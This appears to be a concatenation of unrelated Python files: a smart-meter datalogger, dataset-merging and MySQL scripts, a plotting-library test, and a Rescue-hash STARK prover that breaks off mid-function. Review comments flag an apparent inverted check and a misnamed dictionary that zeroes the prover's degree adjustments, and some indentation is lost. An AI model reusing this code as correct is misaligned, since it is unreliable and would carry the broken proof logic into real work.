    response = requests.post(
        api_url,
        headers={'Authorization': 'Token {}'.format(api_key)},
        data={'telegram': telegram},
        timeout=timeout,
    )
    if response.status_code == 201:
        logger.debug('[%s] API response OK: Telegram received successfully', datetime.datetime.now())
        return
    logger.error('[%s] API error: HTTP %d - %s', datetime.datetime.now(), response.status_code, response.text)
def _initialize_logging():
    """Configure the module logger: DEBUG when DATALOGGER_DEBUG_LOGGING is set, else INFO."""
    debug_enabled = decouple.config('DATALOGGER_DEBUG_LOGGING', default=False, cast=bool)
    logger.setLevel(logging.DEBUG if debug_enabled else logging.INFO)
    logger.addHandler(logging.StreamHandler())
def main(): # noqa: C901
    """ Entrypoint for command line execution only.

    Reads all DATALOGGER_* settings from the environment (via decouple),
    then loops forever: read one telegram, forward it to every configured
    DSMR-reader host, sleep, repeat.
    """
    _initialize_logging()
    logger.info('[%s] Starting...', datetime.datetime.now())
    # Settings.
    DATALOGGER_TIMEOUT = decouple.config('DATALOGGER_TIMEOUT', default=20, cast=float)
    DATALOGGER_SLEEP = decouple.config('DATALOGGER_SLEEP', default=0.5, cast=float)
    DATALOGGER_INPUT_METHOD = decouple.config('DATALOGGER_INPUT_METHOD')
    DATALOGGER_API_HOSTS = decouple.config('DATALOGGER_API_HOSTS', cast=decouple.Csv(post_process=tuple))
    DATALOGGER_API_KEYS = decouple.config('DATALOGGER_API_KEYS', cast=decouple.Csv(post_process=tuple))
    DATALOGGER_MIN_SLEEP_FOR_RECONNECT = decouple.config('DATALOGGER_MIN_SLEEP_FOR_RECONNECT', default=1.0, cast=float)
    if not DATALOGGER_API_HOSTS or not DATALOGGER_API_KEYS:
        raise RuntimeError('API_HOSTS or API_KEYS not set')
    if len(DATALOGGER_API_HOSTS) != len(DATALOGGER_API_KEYS):
        raise RuntimeError('The number of API_HOSTS and API_KEYS given do not match each other')
    serial_kwargs = dict(
        telegram_timeout=DATALOGGER_TIMEOUT,
    )
    # Connection parameters depend on the configured input method.
    if DATALOGGER_INPUT_METHOD == 'serial':
        serial_kwargs.update(dict(
            url_or_port=decouple.config('DATALOGGER_SERIAL_PORT'),
            baudrate=decouple.config('DATALOGGER_SERIAL_BAUDRATE', cast=int, default=115200),
            bytesize=decouple.config('DATALOGGER_SERIAL_BYTESIZE', cast=int, default=serial.EIGHTBITS),
            parity=decouple.config('DATALOGGER_SERIAL_PARITY', cast=str, default=serial.PARITY_NONE),
            stopbits=serial.STOPBITS_ONE,
            xonxoff=1,
            rtscts=0,
        ))
    elif DATALOGGER_INPUT_METHOD == 'ipv4':
        serial_kwargs.update(dict(
            url_or_port='socket://{}:{}'.format(
                decouple.config('DATALOGGER_NETWORK_HOST'),
                decouple.config('DATALOGGER_NETWORK_PORT', cast=int),
            )
        ))
    else:
        raise RuntimeError('Unsupported DATALOGGER_INPUT_METHOD')
    datasource = None
    while True:
        # (Re)create the telegram generator when there is none.
        if not datasource:
            datasource = read_telegram(**serial_kwargs)
        telegram = next(datasource)
        # Do not persist connections when the sleep is too high.
        if DATALOGGER_SLEEP >= DATALOGGER_MIN_SLEEP_FOR_RECONNECT:
            datasource = None
        logger.info("[%s] Telegram read", datetime.datetime.now())
        # Forward the telegram to every configured host; one failing host
        # must not prevent delivery to the others.
        for current_server_index in range(len(DATALOGGER_API_HOSTS)):
            current_api_host = DATALOGGER_API_HOSTS[current_server_index]
            current_api_url = '{}/api/v1/datalogger/dsmrreading'.format(current_api_host)
            current_api_key = DATALOGGER_API_KEYS[current_server_index]
            try:
                _send_telegram_to_remote_dsmrreader(
                    telegram=telegram,
                    api_url=current_api_url,
                    api_key=current_api_key,
                    timeout=DATALOGGER_TIMEOUT,
                )
            except Exception as error:
                logger.exception(error)
        logger.debug("[%s] Sleeping for %s second(s)", datetime.datetime.now(), DATALOGGER_SLEEP)
        time.sleep(DATALOGGER_SLEEP)
if __name__ == '__main__': # pragma: no cover
main()
|
21,971 | fab5b342ec6e5d181e1ffbf5ffcd33433f883d4c | from preprocess import *
import os
# Build per-batch pickled datasets, then merge them into one 'total' mini dataset.
file = './data/processed/batch4.data'
# NOTE(review): per-batch processing only runs when batch4's pickle already
# exists — this guard looks inverted; confirm whether `not os.path.exists`
# was intended.
if os.path.exists(file):
    for b_idx in range(1, 5):
        bin_file = './data/processed/batch%d.data' % b_idx
        batch = 'b%d' % b_idx
        data_path = r'./data/raw/batch%d' % b_idx
        D = data(bin_file)
        print('Process batch : %d' % b_idx)
        # Load the cached pickle when available; otherwise parse the raw files.
        if os.path.exists(D.bin_file):
            with open(D.bin_file, 'rb') as f:
                D = pickle.load(f)
            D.bin_file = bin_file
        else:
            D.read_data(batch, data_path)
            D.save_data()
        D.produce_minidata()
        del D  # release the batch before loading the next one
bin_file = './data/processed/total.data_Mini'
D = data(bin_file)
# Merge the four per-batch mini datasets into one (cached on disk).
if not os.path.exists(D.bin_file):
    D1 = data('./data/processed/batch1.data_Mini')
    D2 = data('./data/processed/batch2.data_Mini')
    D3 = data('./data/processed/batch3.data_Mini')
    D4 = data('./data/processed/batch4.data_Mini')
    with open(D1.bin_file, 'rb') as f:
        D1 = pickle.load(f)
    for cap in D1.caps:
        D.caps.append(cap)
    del D1
    with open(D2.bin_file, 'rb') as f:
        D2 = pickle.load(f)
    for cap in D2.caps:
        D.caps.append(cap)
    del D2
    with open(D3.bin_file, 'rb') as f:
        D3 = pickle.load(f)
    for cap in D3.caps:
        D.caps.append(cap)
    del D3
    with open(D4.bin_file, 'rb') as f:
        D4 = pickle.load(f)
    for cap in D4.caps:
        D.caps.append(cap)
    del D4
    D.save_data()
else:
    with open(D.bin_file, 'rb') as f:
        D = pickle.load(f)
# The index we use
train_index, test_index = index_split(D.caps)
# The methods to get data or feature
# cap.get_data_from_cycle('cycle', 'discharge_capacitance(F)', 657)
# cap.V_drop_with_cycle(657,2)
|
def reverse(s):
    """Return the characters of ``s`` in reverse order, joined into a string."""
    return ''.join(s[::-1])
# Python 2 print statement: smoke-test of reverse().
print reverse("string reverse works now")
|
21,973 | e19eccc4e8552c4cbd4e93c4841bfff451576913 | from connectdb import connection
import MySQLdb
import random
import urllib2
def randomize_1000():
    """Insert 15 rows of random words at jittered coordinates, then dump the table.

    Python 2 script (xrange / urllib2).  On any failure the error is
    returned as a string instead of being raised.
    """
    try:
        c,conn = connection()
        # NOTE(review): names look swapped — 40.07 is a latitude and -88.30 a
        # longitude for the Urbana, IL area; verify against the table columns.
        baselong = 40.073410
        baselat = -88.304178
        for i in xrange(15):
            templong = baselong + random.random()*0.06
            templat = baselat + random.random()*0.141
            # One HTTP round-trip per row to fetch a random word (slow, network-bound).
            word = str(urllib2.urlopen("http://randomword.setgetgo.com/get.php").read())
            # Parameterized INSERT (no string formatting into SQL).
            c.execute("INSERT INTO wordlocation (word,longitude,latitude,definition,lang) VALUES(%s,%s,%s,%s,%s)",
            (word,templong,templat,'I honestly dont know','english'))
            conn.commit()
        c.execute("SELECT * FROM wordlocation")
        for row in c.fetchall():
            print str(row)
        c.close()
        return
    except Exception as e:
        # Best-effort: swallow the exception and hand back its text.
        return str(e)
# Run immediately on import/execution.
randomize_1000()
|
21,974 | 3ab02d75586e32696aaea4380357112fe046af93 | from livelossplot import PlotLosses
from livelossplot.outputs import ExtremaPrinter
def test_extrema_print():
    """Test if plugin object cache contains valid values"""
    metric_groups = {'accuracy': ['acc', 'val_acc'], 'log-loss': ['loss', 'val_loss']}
    printer = ExtremaPrinter()
    liveplot = PlotLosses(outputs=(printer, ), groups=metric_groups)
    history = [
        {'acc': 0.5, 'val_acc': 0.4, 'loss': 1.2, 'val_loss': 1.1},
        {'acc': 0.55, 'val_acc': 0.45, 'loss': 1.1, 'val_loss': 1.0},
        {'acc': 0.65, 'val_acc': 0.35, 'loss': 0.5, 'val_loss': 0.9},
        {'acc': 0.65, 'val_acc': 0.55, 'loss': 1.0, 'val_loss': 0.9},
    ]
    for step in history:
        liveplot.update(step)
    liveplot.send()
    cache = printer.extrema_cache
    assert len(cache['log-loss']) == 2
    assert len(cache['log-loss']['training']) == 3
    assert cache['accuracy']['validation']['min'] == 0.35
    assert cache['accuracy']['validation']['max'] == 0.55
    assert cache['accuracy']['validation']['current'] == 0.55
|
21,975 | e2bebf72c00946ebd276e1e10eb8fc58488cd019 | import numpy as np
from math import ceil, log
import time
from .rescue.rescue_constants import MDS_MATRIX, INV_MDS_MATRIX, ROUND_CONSTANTS, PRIME, WORD_SIZE, NUM_ROUNDS, STATE_SIZE
from .poly_utils import PrimeField
from .utils import get_power_cycle, get_pseudorandom_indices, is_a_power_of_2
from .fft import fft
from .fri import prove_low_degree, verify_low_degree_proof
from .permuted_tree import merkelize, mk_branch, verify_branch, blake, mk_multi_branch, verify_multi_branch
import random
# Protocol parameters for the Rescue STARK.
modulus = PRIME
extension_factor = 8          # evaluation-domain blowup factor
f = PrimeField(modulus)
TRACE_SIZE = 16               # registers per trace row (state padded to a power of two)
RAND_BEFORE = 1               # randomness blocks inserted before the file hash
RAND_AFTER = 0                # randomness blocks inserted after the file hash
spot_check_security_factor = 20
BatchHeight = 32              # trace rows per hash batch
HashesPerBatch = 3
# All-zero degree-adjustment table — this is the dict the code below reads.
constraints_powers_dict = {i : (lambda x,y:0) for i in range(20)}
# NOTE(review): the populated table below has a near-identical name
# ('constrains_power_dict') and is never read anywhere in this file —
# this looks like a typo for constraints_powers_dict; confirm which
# table is intended before relying on the degree adjustments.
constrains_power_dict = {
    0: lambda total_power, comp_length: total_power - comp_length,
    1: lambda total_power, comp_length: total_power - comp_length,
    2: lambda total_power, comp_length: total_power - 6*comp_length,
    3: lambda total_power, comp_length: total_power - 6*comp_length,
    4: lambda total_power, comp_length: total_power - 6*comp_length,
    5: lambda total_power, comp_length: total_power - 6*comp_length,
    6: lambda total_power, comp_length: total_power - 4*comp_length,
    7: lambda total_power, comp_length: total_power - comp_length,
    8: lambda total_power, comp_length: total_power - comp_length,
    9: lambda total_power, comp_length: total_power - comp_length,
    10: lambda total_power, comp_length: total_power - comp_length,
    11: lambda total_power, comp_length: total_power - comp_length,
    12: lambda total_power, comp_length: total_power - comp_length,
    13: lambda total_power, comp_length: total_power - comp_length,
    14: lambda total_power, comp_length: total_power - comp_length,
    15: lambda total_power, comp_length: total_power - comp_length,
    16: lambda total_power, comp_length: total_power - comp_length,
    17: lambda total_power, comp_length: total_power - comp_length,
    18: lambda total_power, comp_length: total_power - comp_length,
    19: lambda total_power, comp_length: total_power - comp_length,
}
NUM_CONSTRAINTS = 200
def HalfRound(state, round_index, p):
    """Apply half a Rescue round to ``state`` modulo ``p``.

    Odd-indexed half-rounds use the inverse S-box exponent (2p-1)/3, even
    ones the forward cube; both are followed by the MDS mix and the
    round-constant addition for ``round_index``.
    """
    mds = np.array(MDS_MATRIX, dtype=object) % p
    if round_index % 2 == 1:
        substituted = [pow(value, (2*p - 1) // 3, p) for value in state]
    else:
        substituted = [pow(value, 3, p) for value in state]
    mixed = mds.dot(substituted) % p
    return [(mixed[i] + ROUND_CONSTANTS[round_index][i]) % p for i in range(STATE_SIZE)]
def get_power_list(total_length, comp_length, hash = True):
    """Return the degree-adjustment power for every constraint polynomial.

    Entries are appended in the order the constraint families are built:
    families 0..9 with their per-family multiplicities, family 10 only when
    ``hash`` is True, then TRACE_SIZE + 1 trailing entries of
    total_length - comp_length.

    NOTE(review): this reads ``constraints_powers_dict`` (the all-zero
    lambdas); the populated table is named ``constrains_power_dict`` —
    looks like a typo, confirm which dict is intended.
    """
    powers = []
    for i in range(4):
        powers.append(constraints_powers_dict[0](total_length, comp_length))
    for i in range(4):
        powers.append(constraints_powers_dict[1](total_length, comp_length))
    for i in range(STATE_SIZE):
        powers.append(constraints_powers_dict[2](total_length, comp_length))
    for i in range(4):
        powers.append(constraints_powers_dict[3](total_length, comp_length))
    for i in range(STATE_SIZE - 4):
        powers.append(constraints_powers_dict[4](total_length, comp_length))
    for i in range(4):
        powers.append(constraints_powers_dict[5](total_length, comp_length))
    for i in range(STATE_SIZE):
        powers.append(constraints_powers_dict[6](total_length, comp_length))
    for i in range(4):
        powers.append(constraints_powers_dict[7](total_length, comp_length))
    for i in range(4):
        powers.append(constraints_powers_dict[8](total_length, comp_length))
    for i in range(STATE_SIZE*STATE_SIZE):
        powers.append(constraints_powers_dict[9](total_length, comp_length))
    if hash:
        for i in range(4):
            powers.append(constraints_powers_dict[10](total_length, comp_length))
    for i in range(TRACE_SIZE + 1):
        powers.append(total_length - comp_length)
    return powers
def append_state(trace, state):
    """Append one state column to ``trace``, zero-padding registers
    STATE_SIZE..TRACE_SIZE-1 (the trace is wider than the Rescue state)."""
    for row in range(TRACE_SIZE):
        trace[row].append(state[row] if row < STATE_SIZE else 0)
def rescue_computational_trace(input, file_hash = None, output = None):
    """Build the flattened Rescue execution trace for ``input``.

    The input (optionally sandwiching ``file_hash`` between random field
    elements) is padded so the number of hash batches is a power of two,
    the Rescue permutation is run while recording intermediate states, and
    the per-register trace is flattened column-major into one list.

    Raises AssertionError when the computed hash of the original input does
    not match ``output``.
    NOTE(review): parameter ``input`` shadows the builtin; kept for
    interface compatibility.
    """
    input_length = len(input)
    # Optionally sandwich the file hash between random field elements.
    if file_hash is not None:
        input_and_hash = input + [random.randrange(1, PRIME) for _ in range(12*RAND_BEFORE)] + file_hash + [random.randrange(1, PRIME) for _ in range(8 + 12*RAND_AFTER)]
    else:
        input_and_hash = input[:]
    inp_hash_length = len(input_and_hash)
    chain_length = ceil((inp_hash_length - 4) / 4)
    # We do HashesPerBatch so that the total append_states amount will be BatchHeight, which is a power of two
    log_trace_length = log(ceil(chain_length / HashesPerBatch), 2)
    # We want to have a power of 2 number of batches, so that the total height will also be a power of 2
    trace_length = 2**(ceil(log_trace_length))
    #We want the trace to be of length that is a power of two.
    new_input = input_and_hash + [random.randrange(1, PRIME)for _ in range(4 + 12*trace_length - inp_hash_length)]
    trace_length = 32*trace_length
    p = PRIME
    trace = [[] for i in range(TRACE_SIZE)]
    state = [0] * STATE_SIZE
    inp_index = 0
    # Absorb the first four input words into the state.
    for i in range(4):
        state[i] = new_input[inp_index + i]
    inp_index += 4
    while len(trace[0]) < trace_length:
        # HashesPerBatch chained hashes per batch of BatchHeight rows.
        for hash_ind in range(3):
            # Absorb the next four input words; zero the capacity words.
            for i in range(4):
                state[4 + i] = new_input[inp_index + i]
                state[8 + i] = 0
            inp_index += 4
            if hash_ind == 0:
                append_state(trace, state)
            state = [(state[i] + ROUND_CONSTANTS[0][i]) % p for i in range(STATE_SIZE)]
            for round in range(NUM_ROUNDS):
                state = HalfRound(state, round*2 + 1, p)
                append_state(trace, state)
                state = HalfRound(state, round*2 + 2, p)
            if input_length <= inp_index and inp_index < input_length + 4:
                #We're right after the original hash calculation
                assert state[:4] == output, "Error in hash calculation"
        append_state(trace, state)
    assert len(trace[0]) % 32 == 0
    # Flatten column-major: all TRACE_SIZE registers of row 0, then row 1, ...
    full_trace = []
    for i in range(len(trace[0])):
        for s in trace:
            full_trace.append(s[i])
    return full_trace
def create_rescue_polynoms(precision, output, file_hash = None):
    """Low-degree-extend the Rescue constant/MDS/output tables.

    Returns evaluations over the size-``precision`` domain of: the even-step
    round constants, the odd-step constants laid out per trace register, the
    MDS and inverse-MDS rows, the expected ``output``, and (when given) the
    ``file_hash`` — otherwise None for the last element.
    """
    comp_length = precision // extension_factor
    # Root of unity such that x^precision=1
    G2 = f.exp(7, (modulus - 1) // precision)
    # Root of unity such that x^steps=1
    skips = precision // comp_length
    G1 = f.exp(G2, skips)
    #Create consts polynomial for each state_ind
    all_even_consts = []
    all_odd_consts = []
    for state_ind in range(TRACE_SIZE):
        odd_consts = []
        even_consts = []
        even_consts.append(0)
        if state_ind < STATE_SIZE:
            # One constant segment per hash in the batch; BatchHeight rows total.
            for j in range(HashesPerBatch):
                if state_ind < 4:
                    # Rate words carry over between chained hashes, so the
                    # round-0 constant is merged into the previous boundary row.
                    even_consts[-1] += ROUND_CONSTANTS[0][state_ind]
                else:
                    even_consts[-1] = ROUND_CONSTANTS[0][state_ind]
                for round in range(NUM_ROUNDS):
                    odd_consts.append(ROUND_CONSTANTS[2*round + 1][state_ind])
                    even_consts.append(ROUND_CONSTANTS[2*round + 2][state_ind])
            even_consts.append(0)
            odd_consts.append(0)
            odd_consts.append(0)
        else:
            # Padding registers beyond STATE_SIZE carry no constants.
            even_consts = [0]*BatchHeight
            odd_consts = [0]*BatchHeight
        all_even_consts.append(even_consts)
        all_odd_consts.append(odd_consts)
    # Lay the per-register constants out along the trace ordering, then LDE.
    all_even_next_eval = [all_even_consts[i % TRACE_SIZE][(i // TRACE_SIZE) % BatchHeight] for i in range(comp_length)]
    all_even_poly = fft(all_even_next_eval, modulus, G1, inv = True)
    all_even_eval = fft(all_even_poly, modulus, G2)
    all_odd_next_eval = [all_odd_consts[i % TRACE_SIZE][(i // TRACE_SIZE) % BatchHeight] for i in range(comp_length)]
    # Embed the STATE_SIZE x STATE_SIZE MDS matrices into TRACE_SIZE x TRACE_SIZE (zero padded).
    new_mds = [[] for i in range(TRACE_SIZE)]
    new_inv_mds = [[] for i in range(TRACE_SIZE)]
    for i in range(TRACE_SIZE):
        for j in range(TRACE_SIZE):
            if i < STATE_SIZE and j < STATE_SIZE:
                new_mds[i].append(MDS_MATRIX[i][j])
                new_inv_mds[i].append(INV_MDS_MATRIX[i][j])
            else:
                new_mds[i].append(0)
                new_inv_mds[i].append(0)
    # Repeat each matrix column along the trace domain and low-degree extend.
    mds_mini = []
    inv_mds_mini = []
    for i in range(TRACE_SIZE):
        mds_mini.append([new_mds[j % TRACE_SIZE][i] for j in range(comp_length)])
        inv_mds_mini.append([new_inv_mds[j % TRACE_SIZE][i] for j in range(comp_length)])
    mds_poly = [fft(mini, modulus, G1, inv = True) for mini in mds_mini]
    inv_mds_poly = [fft(mini, modulus, G1, inv = True) for mini in inv_mds_mini]
    mds_eval = [fft(poly, modulus, G2) for poly in mds_poly]
    inv_mds_eval = [fft(poly, modulus, G2) for poly in inv_mds_poly]
    # Per-register layout of the odd constants (constant within each row of TRACE_SIZE).
    odd_consts_mod_mini = []
    for i in range(TRACE_SIZE):
        odd_consts_mod_mini.append([all_odd_next_eval[j - (j % TRACE_SIZE) + i] for j in range(comp_length)])
    odd_consts_mod_poly = [fft(mini, modulus, G1, inv = True) for mini in odd_consts_mod_mini]
    odd_consts_mod_eval = [fft(poly, modulus, G2) for poly in odd_consts_mod_poly]
    # Tile the expected hash output across the domain and extend it.
    output_mini = [output[i % len(output)] for i in range(comp_length)]
    output_poly = fft(output_mini, modulus, G1, inv = True)
    output_eval = fft(output_poly, modulus, G2)
    if file_hash is not None:
        file_hash_mini = [file_hash[i % len(file_hash)] for i in range(comp_length)]
        file_hash_poly = fft(file_hash_mini, modulus, G1, inv = True)
        file_hash_eval = fft(file_hash_poly, modulus, G2)
        return all_even_eval, odd_consts_mod_eval, mds_eval, inv_mds_eval, output_eval, file_hash_eval
    return all_even_eval, odd_consts_mod_eval, mds_eval, inv_mds_eval, output_eval, None
def rescue_sign(password, password_output, file_hash = None, constraints_powers_dict=constraints_powers_dict):
start_time = time.time()
full_trace = rescue_computational_trace(password, file_hash, output = password_output)
comp_length = len(full_trace)
input_length = len(password)
chain_length = ceil((input_length - 4) / 4)
precision = comp_length * extension_factor
# Root of unity such that x^precision=1
G2 = f.exp(7, (modulus - 1) // precision)
# Root of unity such that x^steps=1
skips = precision // comp_length
G1 = f.exp(G2, skips)
# Powers of the higher-order root of unity
xs = get_power_cycle(G2, modulus)
skips2 = comp_length // (BatchHeight * TRACE_SIZE)
all_even_eval, odd_consts_mod_eval, mds_eval, inv_mds_eval, output_eval, file_hash_eval = create_rescue_polynoms(precision, password_output, file_hash)
# Interpolate the computational trace into a polynomial P, with each step
# along a successive power of G1
computational_trace_polynomial = fft(full_trace, modulus, G1, inv=True)
p_evaluations_extension = fft(computational_trace_polynomial, modulus, G2)
print('Converted computational steps into a polynomial and low-degree extended it')
p_mod_mini = []
for i in range(TRACE_SIZE):
p_mod_mini.append([full_trace[j - (j % TRACE_SIZE) + i] for j in range(comp_length)])
p_mod_poly = [fft(mini, modulus, G1, inv = True) for mini in p_mod_mini]
p_mod_eval = [fft(poly, modulus, G2) for poly in p_mod_poly]
state_after_eval = all_even_eval[:]
for i in range(TRACE_SIZE):
state_after_eval = [f.add(st, f.mul(m, f.exp(p, 3))) for (st, m, p) in zip(state_after_eval, mds_eval[i], p_mod_eval[i])]
state_before_eval = [0 for i in range(precision)]
for i in range(TRACE_SIZE):
subbed = [f.sub(p_mod_eval[i][(j + TRACE_SIZE * extension_factor) % precision], odd_consts_mod_eval[i][j]) for j in range(precision)]
state_before_eval = [f.add(st, f.mul(m, su)) for (st, m, su) in zip(state_before_eval, inv_mds_eval[i], subbed)]
state_before_eval = [f.exp(st, 3) for st in state_before_eval]
#We compute evaluation on the extension field
trace_plus_round0_eval = [p_evaluations_extension[i] + all_even_eval[i] for i in range(precision)]
trace_minus_output_eval = [p_evaluations_extension[i] - output_eval[i] for i in range(precision)]
if file_hash_eval is not None:
trace_minus_file_hash_eval = [p_evaluations_extension[i] - file_hash_eval[i] for i in range(precision)]
print("Computed all values polynomials")
constraints = []
#We enforce constraints on the state - such that
# 1. The trace is a true rescue computation state
# 2. The hash of the passwords appears in the state
# 3. The file_hash is hashed as well
# 4. The p_mod_evals are correct
skips3 = comp_length // TRACE_SIZE
#This represents something that happens once every state
once_state_eval = [xs[(i*skips3) % precision] - 1 for i in range(precision)]
#Constraints 0 check that the last 4 bytes of every state are 0 (since we need a power of 2, but the original state is only of size 12)
for state_ind in range(STATE_SIZE, TRACE_SIZE):
filler_states = [once_state_eval[(i - state_ind*extension_factor)%precision] for i in range(precision)]
filler_states_inv = f.multi_inv(filler_states)
constraint0_evals = [f.mul(pv, fs) for (pv, fs) in zip(p_evaluations_extension, filler_states_inv)]
constraints.append((0, constraint0_evals))
#This represents something that happens once every batch
once_batch_eval = [xs[(i*skips2) % precision] - 1 for i in range(precision)]
#Constraints 1 check that in the beginning of each batch, bytes 8-12 are 0 (since the inital state is only of size 8)
for state_ind in range(8, STATE_SIZE):
barch_ind0 = [once_batch_eval[(i - 0 * TRACE_SIZE * extension_factor - state_ind * extension_factor) %precision] for i in range(precision)]
batch_ind0_inv = f.multi_inv(barch_ind0)
constraint1_evals = [f.mul(pv , bi) for (pv, bi) in zip(p_evaluations_extension, batch_ind0_inv)]
constraints.append((1, constraint1_evals))
#Constraints 2 check that at the beginning of each batch, the first state is just half_state before the next one (this is a rescue demand)
for state_ind in range(0, STATE_SIZE):
batch_ind0 = [once_batch_eval[(i - 0 * TRACE_SIZE*extension_factor - state_ind * extension_factor) %precision] for i in range(precision)]
batch_ind0_inv = f.multi_inv(batch_ind0)
constraints2_eval = [f.mul(f.sub(tpc0, stb) ,bi) for (tpc0, stb, bi) in zip(trace_plus_round0_eval, state_before_eval, batch_ind0_inv)]
constraints.append((2, constraints2_eval))
#Constraint3 represents that for every 2 states that are not the beginning or end
# (i % 32 != 0, 30, 31), we have state_before(next half round) = state_after(half round)
# That's true for the first 4 bytes because:
# a) they pass on (and not deleted in the next hash iteration)
# b) we've fixed consts such that they already include consts[0]
for state_ind in range(0, 4):
batch_ind0 = [once_batch_eval[(i - 0 * TRACE_SIZE *extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind30 = [once_batch_eval[(i - 30 * TRACE_SIZE *extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind31 = [once_batch_eval[(i - 31 * TRACE_SIZE *extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
all_batches = [f.mul(f.mul(bi0, bi30),bi31) for (bi0, bi30, bi31) in zip(batch_ind0, batch_ind30, batch_ind31)]
filler_states = [once_state_eval[(i - state_ind* extension_factor)%precision] for i in range(precision)]
filler_states_inv = f.multi_inv(filler_states)
constraints3_eval = [(sta - stb) * abi * fs for (sta, stb, abi, fs) in zip(state_after_eval, state_before_eval, all_batches, filler_states_inv)]
constraints.append((3, constraints3_eval))
#Constraint4 is almost as 3, but for 4:12, and that means that this condition does not apply
# also when starting a new hash within the same batch (index 10, 20 as well)
for state_ind in range(4, STATE_SIZE):
batch_ind0 = [once_batch_eval[(i - 0 * TRACE_SIZE * extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind10 = [once_batch_eval[(i - 10 * TRACE_SIZE * extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind20 = [once_batch_eval[(i - 20 * TRACE_SIZE * extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind30 = [once_batch_eval[(i - 30 * TRACE_SIZE * extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind31 = [once_batch_eval[(i - 31 * TRACE_SIZE * extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
all_batches = [f.mul(f.mul(f.mul(f.mul(bi0, bi10),bi20), bi30),bi31) for (bi0, bi10 , bi20, bi30, bi31) in zip(batch_ind0, batch_ind10, batch_ind20, batch_ind30, batch_ind31)]
filler_states = [once_state_eval[(i - state_ind * extension_factor)%precision] for i in range(precision)]
filler_states_inv = f.multi_inv(filler_states)
constraints4_eval = [(sta - stb) * abi * fs for (sta, stb, abi, fs) in zip(state_after_eval, state_before_eval, all_batches, filler_states_inv)]
constraints.append((4, constraints4_eval))
# Constraints 5 check that in the new hashes within the same batch (indexes 10, 20), bytes 8:12 are 0 (since a new hash's initial state is only 8 bytes)
for state_ind in range(STATE_SIZE - 4, STATE_SIZE):
batch_ind10 = [once_batch_eval[(i - 10 * TRACE_SIZE* extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch_ind20 = [once_batch_eval[(i - 20 * TRACE_SIZE* extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
all_batches = [f.mul(b10, b20) for (b10, b20) in zip(batch_ind10, batch_ind20)]
all_batches_inv = f.multi_inv(all_batches)
constraints5_eval = [f.sub(state_before_eval[i], all_even_eval[i]) * all_batches_inv[i] for i in range(precision)]
constraints.append((5, constraints5_eval))
# Constraints 6 checks that the start of the last state is just half round after the one before it.
for state_ind in range(0, STATE_SIZE):
batch_ind30 = [once_batch_eval[(i - 30 * TRACE_SIZE* extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch30_inv = f.multi_inv(batch_ind30)
constraints6_eval = [(p_evaluations_extension[(i + extension_factor*TRACE_SIZE) % precision] - state_after_eval[i]) * batch30_inv[i] for i in range(precision)]
constraints.append((6, constraints6_eval))
# Constraints 7 check that the first row after a batch is the last row before the batch (since this is how we create the trace)
for state_ind in range(0, 4):
batch_ind31 = [once_batch_eval[(i - 31 * TRACE_SIZE* extension_factor - state_ind * extension_factor)%precision] for i in range(precision)]
batch31_inv = f.multi_inv(batch_ind31)
last_step_eval = [xs[i] - xs[(comp_length - TRACE_SIZE + state_ind)*extension_factor] for i in range(precision)]
constraints7_eval = [(p_evaluations_extension[(i + extension_factor*TRACE_SIZE) % precision] - p_evaluations_extension[i]) * batch31_inv[i] * last_step_eval[i] for i in range(precision)]
constraints.append((7, constraints7_eval))
#Constraints 8 check that the password hash is actually within the trace in the right spot (this checks that we actually have a preimage of the hash)
for state_ind in range(0, len(password_output)):
output_row_eval = [xs[i] - xs[(ceil(chain_length/HashesPerBatch) * BatchHeight * TRACE_SIZE - TRACE_SIZE + state_ind)*extension_factor] for i in range(precision)]
output_row_inv = f.multi_inv(output_row_eval)
constraints8_eval = [tmo * ori for (tmo, ori) in zip(trace_minus_output_eval, output_row_inv)]
constraints.append((8, constraints8_eval))
#This checks that p_mod_evals are actually computed properly
for state_ind in range(0, STATE_SIZE):
for poly_ind in range(0, STATE_SIZE):
filler_states = [once_state_eval[(i) % precision] for i in range(precision)]
filler_states_inv = f.multi_inv(filler_states)
constraints9_eval = [f.mul(f.sub(p_evaluations_extension[(i + extension_factor*poly_ind) % precision] ,p_mod_eval[poly_ind][(i + state_ind*extension_factor) % precision]), filler_states_inv[i]) for i in range(precision)]
constraints.append((9, constraints9_eval))
#The last constraints check that the file_hash appears within the computational trace in the place it should appear in.
if file_hash is not None:
for state_ind in range(4, 8):
file_hash_row_eval = [xs[i] - xs[(ceil(chain_length/HashesPerBatch) * BatchHeight * TRACE_SIZE + BatchHeight*TRACE_SIZE*RAND_BEFORE + state_ind)*extension_factor] for i in range(precision)]
file_hash_row_inv = f.multi_inv(file_hash_row_eval)
constraints10_eval = [tmo * ori for (tmo, ori) in zip(trace_minus_file_hash_eval, file_hash_row_inv)]
constraints.append((10, constraints10_eval))
print("Computed all constraints polynomials")
#We create merkel trees for the p's and c's (trace polynomials and constraints polynomials)
p_eval_bytes = [x.to_bytes(8, 'big') for x in p_evaluations_extension]
p_mod_eval_bytes = [[x.to_bytes(8, 'big') for x in p_mod_i] for p_mod_i in p_mod_eval]
p_values_bytes = [p_eval_bytes[i] + b"".join([p[i] for p in p_mod_eval_bytes]) for i in range(precision)]
p_mtree = merkelize(p_values_bytes)
constraints_bytes = [[(x % modulus).to_bytes(8,'big') for x in constraint] for _, constraint in constraints]
constraints_concat_bytes = [b"".join([c[i] for c in constraints_bytes]) for i in range(precision)]
c_mtree = merkelize(constraints_concat_bytes)
print("Computed hash roots")
#We generate a linear combination of those polynomials, deg adjusted, with random constants
ks = []
for i in range(2*(len(constraints) + len(p_mod_eval)) + 2):
ks.append(int.from_bytes(blake(p_mtree[1] + i.to_bytes(2, 'big')), 'big') % modulus)
total_power = comp_length*6
#toatl_power - deg(constraint) for each constraint type
#We also add the total_power - def(p) or p_mod (which is comp_length) for them at the end
powers_list = [constraints_powers_dict[ind](total_power, comp_length) for ind, _ in constraints] + [total_power - comp_length for i in range(len(p_mod_eval) + 1)]
powers_eval = []
